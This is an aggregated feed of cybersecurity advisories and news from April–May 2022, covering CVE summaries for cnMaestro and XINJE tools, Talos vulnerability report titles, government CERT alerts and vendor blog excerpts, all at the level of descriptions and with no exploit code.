2022-05-12T00:00:00Z | 1652313600

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') The affected On-Premise cnMaestro is vulnerable to a pre-auth data exfiltration through improper neutralization of special elements used in an SQL command. This could allow an attacker to exfiltrate data about other user's accounts and devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1361
CVE-2022-1360
2022-05-12T00:00:00Z | 1652313600

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') The affected On-Premise cnMaestro is vulnerable to execution of code on the cnMaestro hosting server. This could allow a remote attacker to change server configuration settings.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1360
CVE-2022-1359
2022-05-12T00:00:00Z | 1652313600

CWE-22: IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') The affected On-Premise cnMaestro is vulnerable to an arbitrary file-write through improper limitation of a pathname to a restricted directory inside a specific route. If an attacker supplied path traversal charters (../) as part of a filename, the server will save the file where the attacker chooses. This could allow an attacker to write any data to any file in the server.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1359
CVE-2022-1358
2022-05-12T00:00:00Z | 1652313600

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') The affected On-Premise is vulnerable to data exfiltration through improper neutralization of special elements used in an SQL command. This could allow an attacker to exfiltrate and dump all data held in the cnMaestro database.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1358
CVE-2022-1357
2022-05-12T00:00:00Z | 1652313600

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') The affected On-Premise cnMaestro allows an unauthenticated attacker to access the cnMaestro server and execute arbitrary code in the privileges of the web server. This lack of validation could allow an attacker to append arbitrary data to the logger command.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1357
CVE-2022-1356
2022-05-12T00:00:00Z | 1652313600

CWE-676: USE OF POTENTIALLY DANGEROUS FUNCTION The affected product is vulnerable to a local privilege escalation. By default, a user does not have root privileges. However, a user can run scripts as sudo, which could allow an attacker to gain root privileges when running user scripts outside allowed commands.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1356
UK joins international cyber agency partners to release supply chain guidance
2022-05-11T12:10:48Z | 1652271048

Joint advisory sets out practical steps to take for managed service providers and their customers to protect themselves.

https://www.ncsc.gov.uk/news/uk-joins-international-cyber-agency-partners-to-release-supply-chain-guidance
High Threat Security Alert (A22-05-05): Multiple Vulnerabilities in Microsoft Products (May 2022)
2022-05-11T04:00:00Z | 1652241600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-06): Multiple Vulnerabilities in Google Chrome
2022-05-11T04:00:00Z | 1652241600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-34606
2022-05-11T00:00:00Z | 1652227200

A DLL hijacking vulnerability exists in XINJE PLC Program Tool that enables an attacker to load a malicious DLL from a directory of their choosing. Read Team82's report: From Project Files to Code Execution: Exploiting Vulnerabilities in XINJE PLC Program Tool" Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-34606
CVE-2021-34605
2022-05-11T00:00:00Z | 1652227200

A zip-slip vulnerability exists in XINJE PLC Program Tool that provides an attacker with arbitrary write privileges with the permissions on the program; usually these will be administrator privileges. Read Team82's report: From Project Files to Code Execution: Exploiting Vulnerabilities in XINJE PLC Program Tool" Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-34605
RPC Runtime, Take Two: Discovering a New Vulnerability
2022-05-10T20:00:00Z | 1652212800

Patching and bug hunting is a cyclical process. See part two of our Patch Tuesday RPC Runtime research, updated for May 2022.

https://www.akamai.com/blog/security/rpc-runtime-patch-tuesday-take-two
New email security tool launched to help organisations check their defences
2022-05-10T13:57:10Z | 1652191030

A free email security check service helps organisations identify vulnerabilities.

https://www.ncsc.gov.uk/news/new-email-security-tool-launched-to-help-organisations-check-their-defences
Russia behind cyber attack with Europe-wide impact an hour before Ukraine invasion
2022-05-10T11:15:54Z | 1652181354

New UK and US intelligence suggests Russia was behind an operation targeting commercial communications company Viasat in Ukraine.

https://www.ncsc.gov.uk/news/russia-behind-cyber-attack-with-europe-wide-impact-hour-before-ukraine-invasion
Another wave of FluBot: malware being spread by SMS
2022-05-10T09:01:17Z | 1652173277

The FluBot malware targeting Android devices is once again being actively spread in Finland. The malware aims to steal data from devices, and it is spread via SMS and MMS. Receiving or opening the message is not dangerous, but a malware infected device should be reset to factory settings.

https://www.kyberturvallisuuskeskus.fi/en/varoitus_1/2022
Planning for the Distributed Enterprise of the Future
2022-05-10T07:46:18Z | 1652168778

In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of... The post Planning for the Distributed Enterprise of the Future appeared first on Cato Networks.

https://www.catonetworks.com/blog/planning-for-the-distributed-enterprise-of-the-future/
RIA sõlmis viieaastase mobiil-ID lepingu
2022-05-10T06:00:00Z | 1652162400

Riigi Infosüsteemi Amet (RIA) ning sertifitseerimisteenuse pakkuja SK ID Solutions AS (SK) sõlmisid mobiil-ID teenuse tagamiseks viieaastase lepingu, mis jõustub 2. juulist.

https://ria.ee/uudised/ria-solmis-viieaastase-mobiil-id-lepingu
InHand Networks InRouter302 httpd upload.cgi file write vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1468
InHand Networks InRouter302 console factory stack-based buffer overflow vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1476
InHand Networks InRouter302 console factory OS command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1475
InHand Networks InRouter302 router configuration export information disclosure vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1474
InHand Networks InRouter302 info.jsp cross-site scripting (XSS) vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1469
InHand Networks InRouter302 console infactory_wlan command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1500
InHand Networks InRouter302 console inhand command execution vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1477
InHand Networks InRouter302 libnvram.so nvram_import improper input validation vulnerabilities
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1481
InHand Networks InRouter302 console infactory_net command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1501
InHand Networks InRouter302 daretools binary OS command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1478
InHand Networks InRouter302 httpd parse_ping_result API buffer overflow vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1471
InHand Networks InRouter302 web interface session cookie information disclosure vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1470
InHand Networks InRouter302 console infactory_port OS command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1499
InHand Networks InRouter302 iburn firmware checks firmware update vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1495
InHand Networks InRouter302 router configuration import privilege escalation vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1472
InHand Networks InRouter302 httpd wlscan_ASP OS command injection vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1473
ESTsoft Alyac PE section headers out of bounds read
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1452
InHand Networks InRouter302 console infactory hard-coded password vulnerability
2022-05-10T00:00:00Z | 1652140800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1496
Protecting Your Healthcare Organization During Uncertain Times
2022-05-09T13:00:00Z | 1652101200

Explore three ways healthcare organizations can boost cybersecurity, critical infrastructure, and ransomware protection to prepare for potential cyberthreats.

https://www.akamai.com/blog/security/protecting-your-healthcare-organization-during-uncertain-times
Organisations offered streamlined guidance to help them move to the cloud
2022-05-09T09:29:07Z | 1652088547

Cloud security guidance refreshed to support small businesses to large organisations moving to cloud-based services.

https://www.ncsc.gov.uk/news/organisations-offered-streamlined-guidance-to-help-them-move-to-the-cloud
NCSC significantly expands services to protect UK from record number of online scams
2022-05-09T08:49:38Z | 1652086178

A record number of scams were removed from the internet in 2021 thanks to the Active Cyber Defence programme.

https://www.ncsc.gov.uk/news/ncsc-significantly-expands-services-to-protect-uk-from-record-number-of-online-scams
WPS Office HtmTableAlt use-after-free vulnerability
2022-05-09T00:00:00Z | 1652054400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1412
SonicWall SSL-VPN NetExtender Windows Client Buffer Overflow Vulnerability
2022-05-06T11:44:20Z | 1651837460

A buffer overflow vulnerability in the SonicWall SSL-VPN NetExtender Windows Client (32 and 64 bit) in 10.2.322 and earlier versions, allows an attacker to potentially execute arbitrary code in the host windows operating system. CVE: CVE-2022-22281 Last updated: May 6, 2022, 11:44 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0008
Olukord küberruumis – aprill 2022
2022-05-06T10:29:09Z | 1651832949

Aprillis registreerisime 214 mõjuga intsidenti, mis on viimase aasta keskmisest veidi kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-aprill-2022
NCSC joins the seL4 Foundation
2022-05-05T13:40:02Z | 1651758002

Supporting the long-term development of the seL4 microkernel ecosystem and next generation high-assurance devices.

https://www.ncsc.gov.uk/news/ncsc-joins-the-sel4-foundation
Phishing Is Still a Security Challenge
2022-05-05T13:00:00Z | 1651755600

Phishing is not a new security problem. In fact, it?s been around since the earliest days of email when most users received numerous emails from African kings or other high-ranking officials who promised them great riches if they simply provided their bank account details. Things have changed a lot since then.

https://www.akamai.com/blog/security/phishing-security-challenge
Security Alert (A22-05-03): Multiple Vulnerabilities in Cisco Products
2022-05-05T04:00:00Z | 1651723200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-05-04): Vulnerability in F5 BIG-IP
2022-05-05T04:00:00Z | 1651723200

F5 has published a security advisory to address a vulnerability in F5 devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Anker Eufy Homebase 2 libxm_av.so getpeermac() authentication bypass vulnerability
2022-05-05T00:00:00Z | 1651708800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1479
Anker Eufy Homebase 2 libxm_av.so DemuxCmdInBuffer buffer overflow vulnerability
2022-05-05T00:00:00Z | 1651708800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1480
An Attack Surface Workout for Web Application and API Attacks
2022-05-04T13:00:00Z | 1651669200

WAF Attacks have been increasing dramatically over the last 9 months. These attacks cut across industries, geos and customers. Growth has largely been driven by Local File Inclusion (lfi) attacks, which took the lead from SQL Injection attacks in early 2021 before just taking off in the fall.

https://www.akamai.com/blog/security/attack-surface-workout-web-application-api-attacks
Security Alert (A22-05-02): Multiple Vulnerabilities in Firefox
2022-05-04T04:00:00Z | 1651636800

Mozilla has published the advisories (MFSA2022-16 and MFSA2022-17) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Zero Trust and the Fallacy of Secure Networks
2022-05-03T13:00:00Z | 1651582800

Talking about secure networks is like talking about safe pools. A pool is just a body of water, and if it has enough water to swim in, then it has more than enough water to drown in. A pool is inherently unsafe. We, therefore, take care in how we use a pool: We don?t swim alone; we don?t run around the pool; we don?t dive in the shallow end; and we don?t swim less than 15 minutes after eating. (Is that 15-minute rule still a thing?) These pool-safety policies ensure that our use of the pool is as safe as possible, but they do not make the pool safe in and of itself.

https://www.akamai.com/blog/security/zero-trust-and-the-fallacy-of-secure-networks
Themes from Real World Crypto 2022
2022-05-03T11:00:04Z | 1651575604

Last week, over 500 cryptographers from around the world gathered in Amsterdam for Real World Crypto 2022, meeting in person for the first time in over two years. As in previous years, we dispatched a handful of our researchers and engineers to attend the conference, listen to talks, and schmooze observe the […]

https://blog.trailofbits.com/2022/05/03/themes-from-real-world-crypto-2022/
Overcoming ZTNA Deployment Challenges with the Right Solution
2022-05-03T07:46:18Z | 1651563978

Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA. Why You Might Not Be Using ZTNA (But Should Be) Often, companies have legitimate reasons for not... The post Overcoming ZTNA Deployment Challenges with the Right Solution appeared first on Cato Networks.

https://www.catonetworks.com/blog/overcoming-ztna-deployment-challenges-with-the-right-solution/
Security Alert (A22-05-01): Multiple Vulnerabilities in Android
2022-05-03T04:00:00Z | 1651550400

Google has released Android Security Bulletin May 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Tips for identifying information influence activities – Be vigilant and act responsibly
2022-05-02T11:22:47Z | 1651490567

Over the course of a single day, we encounter an enormous number of different messages, with numerous operators employing various methods to vie for our attention. How, then, can you evaluate the reliability of the information provided in these messages? What should you pay attention to when reading a social media post and deciding whether to share it, for example? What are information influence activities?

https://www.kyberturvallisuuskeskus.fi/en/news/tips-identifying-information-influence-activities-be-vigilant-and-act-responsibly
Tips for identifying information influence activities – Be vigilant and act responsibly
2022-05-02T11:22:47Z | 1651490567

Over the course of a single day, we encounter an enormous number of different messages, with numerous operators employing various methods to vie for our attention. How, then, can you evaluate the reliability of the information provided in these messages? What should you pay attention to when reading a social media post and deciding whether to share it, for example? What are information influence activities?

https://www.kyberturvallisuuskeskus.fi/en/news/tips-identifying-information-influence-activities-be-vigilant-and-act-responsibly
Tens of thousands of denial-of-service attacks occur in Finland every year – numbers increasing
2022-05-02T07:23:37Z | 1651476217

Denial-of-service attacks are everyday occurrences, with over 10,000 attacks reported annually in Finland alone. As such, organisations need to prepare for attacks as part of their everyday operations and risk management.

https://www.kyberturvallisuuskeskus.fi/en/news/tens-thousands-denial-service-attacks-occur-finland-every-year-numbers-increasing
Tens of thousands of denial-of-service attacks occur in Finland every year – numbers increasing
2022-05-02T07:23:37Z | 1651476217

Denial-of-service attacks are everyday occurrences, with over 10,000 attacks reported annually in Finland alone. As such, organisations need to prepare for attacks as part of their everyday operations and risk management.

https://www.kyberturvallisuuskeskus.fi/en/news/tens-thousands-denial-service-attacks-occur-finland-every-year-numbers-increasing
Awareness of the vulnerabilities of digital services more important than ever – vulnerabilities identified and fixed in municipalities’ data networks
2022-05-02T07:20:53Z | 1651476053

Vulnerabilities in the digital services of municipalities and health care and social welfare operators were identified in an assessment project carried out by the Digital and Population Data Services Agency and Finnish Transport and Communications Agency Traficom’s National Cyber Security Centre Finland. The project provided municipalities and health care and social welfare operators with up-to-date information on the vulnerabilities in their services, allowing them to carry out the necessary fixes and thus improve the security of their services.

https://www.kyberturvallisuuskeskus.fi/en/news/awareness-vulnerabilities-digital-services-more-important-ever-vulnerabilities-identified-and
Awareness of the vulnerabilities of digital services more important than ever – vulnerabilities identified and fixed in municipalities’ data networks
2022-05-02T07:20:53Z | 1651476053

Vulnerabilities in the digital services of municipalities and health care and social welfare operators were identified in an assessment project carried out by the Digital and Population Data Services Agency and Finnish Transport and Communications Agency Traficom’s National Cyber Security Centre Finland. The project provided municipalities and health care and social welfare operators with up-to-date information on the vulnerabilities in their services, allowing them to carry out the necessary fixes and thus improve the security of their services.

https://www.kyberturvallisuuskeskus.fi/en/news/awareness-vulnerabilities-digital-services-more-important-ever-vulnerabilities-identified-and
Accusoft ImageGear IGXMPXMLParser::parseDelimiter stack-based buffer overflow vulnerability
2022-05-02T00:00:00Z | 1651449600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1465
Accusoft ImageGear ioca_mys_rgb_allocate memory corruption vulnerability
2022-05-02T00:00:00Z | 1651449600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1449
Suuremahulised ummistusrünnakud on lõppenud
2022-04-29T06:00:00Z | 1651212000

Riigi infosüsteemi ameti hinnangul lõppesid 21. aprillil alanud ummistusrünnakud 25. aprilli õhtuks. Ummistusrünnakutega prooviti häirida 13 veebilehe tööd, kuid vastumeetmete tõttu oli mõju väike.

https://ria.ee/uudised/suuremahulised-ummistusrunnakud-loppenud
Security Alert (A22-04-25): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-04-29T04:00:00Z | 1651204800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Platform Update: Build the Future on Akamai
2022-04-28T13:00:00Z | 1651150800

Today, technology is infused into nearly everything we do. The data behind personalized recommendations, connected devices, and wearables has changed how we engage with the world around us ? whether we?re driving to a new destination, purchasing from a new retailer, or monitoring our health.

https://www.akamai.com/blog/news/build-the-future-on-akamai
How to Buy SASE: Cato Answers Network World’s 18 Essential Questions
2022-04-28T07:46:18Z | 1651131978

Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation. Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed.... The post How to Buy SASE: Cato Answers Network World’s 18 Essential Questions appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-buy-sase-cato-answers-network-worlds-18-questions/
Security Alert (A22-04-24): Multiple Vulnerabilities in Cisco Products
2022-04-28T04:00:00Z | 1651118400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST Technical Colloquium in the Netherlands – sees global experts converge in Amsterdam to share knowledge and inspire collaborations
2022-04-28T01:00:00Z | 1651107600

I had the absolute pleasure of participating in and attending the recent FIRST Technical Colloquium at the W Hotel in Amsterdam, Netherlands, April 12–14. It was great to see nearly 100 people attend and over 50 people participating in training at this long-awaited in-person event. The program featured 17 speakers and two on-site trainers who held several popular workshops.

https://www.first.org/blog/20220428_Chris_Gibson_TC_Netherlands
FIRST Technical Colloquium in the Netherlands – sees global experts converge in Amsterdam to share knowledge and inspire collaborations
2022-04-28T01:00:00Z | 1651107600

I had the absolute pleasure of participating in and attending the recent FIRST Technical Colloquium at the W Hotel in Amsterdam, Netherlands, April 12–14. It was great to see nearly 100 people attend and over 50 people participating in training at this long-awaited in-person event. The program featured 17 speakers and two on-site trainers who held several popular workshops.

https://www.first.org/blog/20220428_Chris_Gibson_TC_Netherlands
Foi publicado Estudo sobre o Ensino de Cibersegurança em Portugal
2022-04-28T00:00:00Z | 1651104000

Este estudo do Observatório de Cibersegurança do CNCS caracteriza os cursos em cibersegurança e a implantação de conteúdos de cibersegurança em cursos e ciclos de estudo da área das Ciências Informáticas, analisando os objetivos, os conteúdos e os resultados de aprendizagem, o número de estudantes, diplomados/as e a sua evolução, bem como o registo das dissertações de mestrado e teses de doutoramento, ao longo dos últimos 10 anos, nesta área. O Estudo analisa ainda as perspetivas dos diretores dos cursos e dos ciclos de estudo de nível superior sobre as componentes da formação técnica, ética e legal, as necessidades do mercado de trabalho e os desafios que se colocam à formação na área de cibersegurança ao nível da investigação e inovação.Consulte o documento principal aqui.E o apêndice aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135662/foi-publicado-estudo-sobre-o-ensino-de-ciberseguranca-em-portugal
SonicWall Global VPN Client DLL Search Order Hijacking via Application Installer
2022-04-27T20:13:53Z | 1651090433

SonicWall Global VPN Client 4.10.7 installer (32-bit and 64-bit) and earlier have a DLL Search Order Hijacking vulnerability in one of the installer components. Successful exploitation via a local attacker could result in command execution in the target system. CVE: CVE-2021-20051 Last updated: April 27, 2022, 8:13 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0036
SonicOS Content Filtering Service and SNMP feature affected by multiple vulnerabilities
2022-04-27T09:41:53Z | 1651052513

SonicOS is affected by the below listed multiple medium severity vulnerabilities, organizations running previous versions of SonicOS should upgrade to new firmware release versions.CVE-2022-22275 - Improper Restriction of TCP Communication Channel Potentially Resulting in DoSSeverity 5.3 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L (CWE-400: Uncontrolled Resource Consumption)HTTP/S inbound traffic from WAN to DMZ bypassing security policy until TCP handshake is complete resulting in potential Denial of Service (DoS) vulnerability if a target host is vulnerable.CVE-2022-22276 - Exposure of Sensitive Information to an Unauthorized User via SNMPSeverity 5.3 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (CWE-200: Exposure of Sensitive Information to an Unauthorized Actor)Configured SNMP service is accessible from SonicOS firewall interface even when the SNMP is disabled in firewall interfaces. CVE-2022-22277 - Exposure of Wireless Access Point Sensitive Information via SNMPSeverity 5.3 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (CWE-200: Exposure of Sensitive Information to an Unauthorized Actor)SNMP-Reply includes SSID Password in cleartext leading to exposure of sensitive information to an unauthorized user.CVE-2022-22278 - Allocation of Resources Without Limits or Throttling Can Potentially Result in HTTP DoS via CFSSeverity 5.3 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L (CWE-770 - Allocation of Resources Without Limits or Throttling)CFS (Content filtering service) in SonicOS returns a large 403 forbidden HTTP response message to the source address when users try to access resources prohibited by CFS feature which allows an attacker to cause an HTTP DoS attack. CVE: CVE-2022-22275, CVE-2022-22276, CVE-2022-22277, CVE-2022-22278 Last updated: April 27, 2022, 9:41 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0004
Security Alert (A22-04-23): Multiple Vulnerabilities in Google Chrome
2022-04-27T04:00:00Z | 1651032000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Fidelis Security Active XDR Platform Expands to Open XDR
2022-04-26T21:12:10Z | 1651007530

BETHESDA, Md.– Fidelis Security, the industry innovator in Active eXtended Detection and Response (XDR) solutions trusted by Fortune 100 firms and government organizations worldwide, announced a more robust and open XDR platform with improvements to its leading Network Detection and Response (NDR) and Deception solutions. Today’s enhancements include new integrations, a larger CommandPost, and a […] The post Fidelis Security Active XDR Platform Expands to Open XDR appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-active-xdr-platform-expands-to-open-xdr/
Reaching the Convergence of Security and Productivity
2022-04-26T19:01:00Z | 1650999660

It?s all too common that IT security tools and practices come at the cost of productivity. Even physical security has this trade-off. There would be no rush to arrive at the airport an hour early if it weren?t for the extensive security measures that flying entails. As a result of this trade-off, our concern often isn?t if we can increase security in our networks ? rather, it?s if the increased security is worth the impact on the business.

https://www.akamai.com/blog/security/reaching-convergence-security-productivity
Protecting the Digital Experience
2022-04-26T13:00:00Z | 1650978000

https://www.akamai.com/blog/news/protect-digital
Improving the state of go-fuzz
2022-04-26T11:00:18Z | 1650970818

During my winternship, I used the findings from recent Go audits to make several improvements to go-fuzz, a coverage-based fuzzer for projects written in Go. I focused on three enhancements to improve the effectiveness of Go fuzzing campaigns and provide a better experience for users. I contributed to fixing type alias […]

https://blog.trailofbits.com/2022/04/26/improving-the-state-of-go-fuzz/
Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers
2022-04-26T07:46:18Z | 1650959178

The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires. However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are... The post Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers appeared first on Cato Networks.

https://www.catonetworks.com/blog/moving-to-ztna-provides-benefits-for-msps-and-their-customers/
What?s New for Developers: April 2022
2022-04-25T13:00:00Z | 1650891600

We have big news this month. You may have already heard that we acquired Linode, creating the world?s most distributed compute platform. In addition, we have release announcements and new developer content to share with you!

https://www.akamai.com/blog/developers/whats-new-for-developers-april-2022
Malware analysis report on SparrowDoor malware
2022-04-25T07:55:43Z | 1650873343

A technical analysis of a new variant of the SparrowDoor malware.

https://www.ncsc.gov.uk/report/mar-sparrowdoor
#Bürokratt valiti parimaks tehisintellektil põhinevaks riigiteenuseks
2022-04-25T06:00:00Z | 1650866400

Aprilli alguses valiti Dubais toimunud World Government Summit konverentsil maailma silmapaistvamaid tehnoloogilisi riigivalitsemise lahendusi. Eesti inimeste virtuaalne assistent Bürokratt pärjati parima tehisintellektil põhineva riigiteenuse tiitliga.

https://ria.ee/uudised/burokratt-valiti-parimaks-tehisintellektil-pohinevaks-riigiteenuseks
FIRST POST: April-June 2022
2022-04-25T00:00:00Z | 1650844800

New Director of IT & Security role to bolster FIRST’s Business Plan; Upcoming Technical Colloquia, Symposiums, and Annual Conference; Last chance to nominate individuals or teams for the Incident Response Hall of Fame; FIRST contributes to important global policy and governance discussions; Mentors sought for new FIRST Mentorship Program; Eleven more member teams join FIRST; FIRST Infrastructure Updates - New Application Process

https://www.first.org/newsroom/newsletters/FIRST_POST_April_Jun_2022.pdf
Laupäeval vähenes ummistusrünnete maht riiklikele veebilehtedele
2022-04-24T08:00:00Z | 1650787200

Kasutajad ei pruukinud märgata, kuidas terve laupäev prooviti ummistusrünnakutega segada mitmeid riigiga seotud veebilehtede ning RIA riigivõrgu tööd.

https://ria.ee/uudised/laupaeval-vahenes-ummistusrunnete-maht-riiklikele-veebilehtedele
Ummistusrünnakud riigi veebilehtede vastu jätkusid
2022-04-22T10:00:00Z | 1650621600

Täna jätkusid ummistusrünnakud riigi või riigiga seotud veebilehtede vastu, kuid nende senine mõju oli tagasihoidlik.

https://ria.ee/uudised/ummistusrunnakud-riigi-veebilehtede-vastu-jatkusid
Security Alert (A22-04-22): Multiple Vulnerabilities in Drupal
2022-04-22T04:00:00Z | 1650600000

Drupal has released security advisories to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Australia Experiences Massive Spike in WAF Multi-Vector, DDoS Attacks
2022-04-21T21:33:00Z | 1650576780

With web applications under increased attacks, Akamai has analyzed data points for web application firewall (WAF) multi-vector and DDoS attacks between April 2021 and March 2022 to determine the severity of the situation in Australia.

https://www.akamai.com/blog/security/australia-waf-multi-vector-ddos-attacks
World-Class Live Streaming From the Royal Opera House
2022-04-21T13:00:00Z | 1650546000

Based in Covent Garden, London, the Royal Opera House brings together the world?s most extraordinary artists to share live, streamed, and broadcast events and performances. We?re delighted that this iconic British institution has chosen to work with Akamai to bring its fantastic productions to the big screen.

https://www.akamai.com/blog/culture/live-streaming-from-the-royal-opera-house
Making the Edge Work for You
2022-04-21T09:00:00Z | 1650531600

For many people, ?building at the edge? may conjure fantastical images of nearly sci-fi?like computational power embedded on devices all around us, crunching massive volumes of data. We?re getting there. Today?s reality is that more workloads are moving to the edge to take advantage of the benefits, but many are still too resource-intensive to be feasible. For the workloads that can be moved, the results can lead to transformational digital experiences for users and developers alike.

https://www.akamai.com/blog/edge/making-the-edge-work-for-you
No signs of spring in cyber weather in March
2022-04-21T07:18:37Z | 1650525517

When it comes to cyber weather, spring is not here yet. Widely reported in the media, denial-of-service attacks are a nuisance but have so far caused no real damage. The malware Emotet subsided over a year ago, but it is now showing signs of becoming active again. Spring was also delayed by phishing campaigns in the name of various reliable operators. Several cyber weather statistics have been updated with figures covering the first months of the year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2022
No signs of spring in cyber weather in March
2022-04-21T07:18:37Z | 1650525517

When it comes to cyber weather, spring is not here yet. Widely reported in the media, denial-of-service attacks are a nuisance but have so far caused no real damage. The malware Emotet subsided over a year ago, but it is now showing signs of becoming active again. Spring was also delayed by phishing campaigns in the name of various reliable operators. Several cyber weather statistics have been updated with figures covering the first months of the year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2022
IT Managers: Read This Before Leaving Your MPLS Provider
2022-04-21T06:00:44Z | 1650520844

Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO. “That MPLS – too expensive. Find an alternative.” This couldn’t have come at a better time… Employees have been blowing up the helpdesk, complaining about slow internet,... The post IT Managers: Read This Before Leaving Your MPLS Provider appeared first on Cato Networks.

https://www.catonetworks.com/blog/it-managers-read-this-before-leaving-your-mpls-provider/
Ummistusrünnakud riigi veebilehtede vastu olid suurema mõjuta
2022-04-21T06:00:00Z | 1650520800

Täna õhtul alates kella 16 tuvastas Riigi Infosüsteemi Ameti (RIA) küberintsidentide käsitlemise osakond (CERT-EE) ummistusrünnakud (DDoS) riiklike veebilehtede vastu. Rünnakute tõttu olid lühiajaliselt häiritud mõne veebilehe kasutamine, kuid suuremat mõju rünnakud ei avaldanud.

https://ria.ee/uudised/ummistusrunnakud-riigi-veebilehtede-vastu-olid-suurema-mojuta
Security Alert (A22-04-21): Multiple Vulnerabilities in Cisco Products
2022-04-21T04:00:00Z | 1650513600

